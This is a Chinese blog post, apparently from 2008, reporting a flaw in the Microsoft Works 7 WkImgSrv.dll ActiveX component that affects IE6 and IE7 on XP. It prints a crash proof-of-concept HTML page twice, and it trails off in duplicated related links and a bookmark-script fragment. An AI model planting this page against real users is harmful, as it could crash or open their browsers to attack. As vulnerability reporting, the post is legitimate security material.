CHM电子书反向编译器 V1.88_单文件绿色注
一波刚平,一波又起,Firefox又出新bug
2008/04/18 01:17 | by
近几天网络上流传着一个传说为IE0DAY的POC代码,在XP系统环境下通杀了IE6和IE7,其它系统并未经过测试。其实这个漏洞并不是存在于IE,而是Microsoft Works的组件被挖掘出漏洞,部分的XP预装了Microsoft Works,所以就出现了过全补丁系统的漏洞(如华硕易PC 就预装了Microsoft Works)。影响的DLL版本:Microsoft Works 7 WkImgSrv.dll (7.03.0616.0)
以下为crash POC
<html>
<head>
<title>Microsoft Works 7 WkImgSrv.dll crash POC</title>
<script language=”JavaScript”>
function payload() {
var num = -1;
obj.WksPictureInterface = num;
}
</script>
</head>
<body onload=”JavaScript: return payload();”>
<object classid=”clsid:00E1DB59-6EFD-4CE7-8C0A-2DA3BCAAD9C6″ id=”obj”>
</object>
</body>
</html>
来自:知道安全
以下为crash POC
<html>
<head>
<title>Microsoft Works 7 WkImgSrv.dll crash POC</title>
<script language=”JavaScript”>
function payload() {
var num = -1;
obj.WksPictureInterface = num;
}
</script>
</head>
<body onload=”JavaScript: return payload();”>
<object classid=”clsid:00E1DB59-6EFD-4CE7-8C0A-2DA3BCAAD9C6″ id=”obj”>
</object>
</body>
</html>
来自:知道安全
相关日志
微软爆重大安全漏洞[附微软补丁地址]
微软8月安全公告 17个危急漏洞创两年来最高记录
RealPlayer再曝四个高危等级漏洞
报告称今年上半年全球恶意软件数量增长278%
警惕:Access 0day漏洞曝光,利用代码已在网上流传
微软爆重大安全漏洞[附微软补丁地址]
微软8月安全公告 17个危急漏洞创两年来最高记录
RealPlayer再曝四个高危等级漏洞
报告称今年上半年全球恶意软件数量增长278%
警惕:Access 0day漏洞曝光,利用代码已在网上流传
收藏本文到网摘:
.text:''):(d.getSelection?d.getSelection():'');void(keyit=window.open('http://my.poco.cn/fav/storeIt.php?t='+escape(d.title)+'&u='+escape(d.location.href)+'&c='+escape(t)+'&img=http://www.h-strong.com/blog/logo.gif','keyit','scrollbars=no,width=475,height=575,left=50,top=50status=no,resizable=yes'));keyit.focus();){kind=logo}
